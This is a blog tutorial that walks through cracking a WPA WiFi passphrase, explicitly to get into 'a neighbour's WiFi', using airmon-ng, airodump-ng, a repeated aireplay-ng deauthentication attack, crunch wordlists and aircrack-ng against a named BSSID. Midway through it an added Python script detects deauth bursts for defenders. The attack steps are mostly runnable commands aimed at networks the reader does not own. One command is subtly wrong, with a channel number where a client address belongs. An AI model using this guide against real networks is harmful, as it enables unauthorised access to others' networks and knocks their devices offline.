The following blog post illustrates wireless password cracking. The demonstration video is attached at the end. We will learn how to hack into a neighbour's WiFi. You need the following prerequisites to carry out the task:
Pre-Requisites:
- Kali Linux
- Router
- Laptop connected to that router
- Wireless adaptor that supports monitor mode
Here we use the Alfa AWUS036NHA adapter, which is compatible with Kali Linux. Monitor mode lets the card listen to all packets on a channel, not only those addressed to it, which is what allows it to capture the handshake. First check that the system recognises the WiFi card:
iwconfig
Step 1: Kill all the running processes
To kill the processes that could interfere with the wireless card, we use the following command:
airmon-ng check kill
Step 2: Enable Monitor Mode
The following command enables monitor mode, which is used to intercept and listen to packets:
airmon-ng start wlan0
wlan0 is the wireless interface. Once monitor mode is enabled, airmon-ng renames it to wlan0mon, which is the name used in the following steps.
Step 3: Scan the networks in the surrounding
Now that the card is in monitor mode, we capture the packets in the surroundings with the following command:
airodump-ng wlan0mon
This command scans the available networks nearby and lists key information such as the BSSID, ESSID, beacons, signal power and channel number.
Step 4: Capture the packets on a specific network
airodump-ng -c 9 --bssid 70:4F:57:21:49:86 -w capture wlan0mon
- -c 9: channel number
- 70:4F:57:21:49:86: BSSID of the AP
- -w: write the captured packets to a file
- capture: prefix of the file the captured packets are written to (airodump-ng appends a sequence number, giving capture-01.cap)
- wlan0mon: interface
We wait for it to capture the handshake.
Step 5: Capture the WPA handshake
We see that it has captured the 4-way handshake between a device and the router. Sometimes a deauth has to be sent to capture the handshake: it kicks a client off the network so that it reconnects and performs the handshake again. We can do this with the following command:
aireplay-ng -0 1 -a 70:4F:57:21:49:86 -c <Channel no. of the client>
This command performs the deauth attack once. You may have to repeat it several times. It is recommended not to use the same client in every attack.
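A defender-side check for the deauth burst this step produces, added here as an example (not from the original post): it counts deauthentication frames per transmitter address in a sliding window and raises one alert per burst. The frame records are constructed, standing in for an export from a wireless monitoring capture; only the AP's BSSID comes from the post.

```python
from collections import defaultdict, deque

# Constructed sample of 802.11 frames as (time_s, type, transmitter, receiver).
# The AP address is the BSSID used throughout this post; client addresses are made up.
AP = "70:4F:57:21:49:86"
CLIENT_A = "AA:BB:CC:00:11:22"  # constructed
CLIENT_B = "AA:BB:CC:33:44:55"  # constructed
SAMPLE_FRAMES = [
    (0.00, "beacon", AP, "ff:ff:ff:ff:ff:ff"),
    (0.10, "deauth", AP, CLIENT_A),   # a single deauth is normal (idle timeout, roaming)
    (5.00, "data", CLIENT_A, AP),
    # Burst of deauths "from" the AP within a few hundredths of a second, spread over
    # two clients: the pattern a deauth run produces. The sender spoofs the AP's
    # address as transmitter, so the AP's own BSSID is the right key to count on.
    (9.00, "deauth", AP, CLIENT_A),
    (9.01, "deauth", AP, CLIENT_B),
    (9.02, "deauth", AP, CLIENT_A),
    (9.03, "deauth", AP, CLIENT_B),
    (9.04, "deauth", AP, CLIENT_A),
    (9.05, "deauth", AP, CLIENT_B),
    (20.0, "data", CLIENT_B, AP),
]


def detect_deauth_bursts(frames, window_s=2.0, threshold=5):
    """Return one alert (transmitter, time_s, count) per burst of >= threshold deauth
    frames from the same transmitter within a sliding window of window_s seconds.
    Counting per transmitter, not per (transmitter, receiver) pair, still catches a
    sender that rotates the targeted client between runs."""
    recent = defaultdict(deque)
    alerts = []
    for t, ftype, src, _dst in sorted(frames):
        if ftype != "deauth":
            continue
        q = recent[src]
        q.append(t)
        while q and t - q[0] > window_s:   # drop frames that fell out of the window
            q.popleft()
        if len(q) >= threshold:
            alerts.append((src, t, len(q)))
            q.clear()                      # one alert per burst, then count afresh
    return alerts


if __name__ == "__main__":
    for src, t, n in detect_deauth_bursts(SAMPLE_FRAMES):
        print(f"ALERT t={t:.2f}s: {n} deauth frames from {src} within a 2 s window")
```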
Step 6: Generate a password list
Once the handshake has been captured, stop the packet capture. Among the captured files you will find one with the “.cap” extension, capture-01.cap.
A password list can either be downloaded, as we did from GitHub, or generated with the following command, which produces every combination of a known character set up to a given length.
crunch 0 9 abcd1234 -o abcd.txt
- 0 9: minimum and maximum length of the password
- abcd1234: character set
- abcd.txt: file where all the combinations of the given character set are saved
Step 7: Crack the password
Finally, use the following command to crack the password:
aircrack-ng -w pswdlist -b 70:4F:57:21:49:86 capture-01.cap
It will take some time to work through the list and, if the passphrase is in it, will print the password. Congratulations!
You can watch the detailed video demonstration here: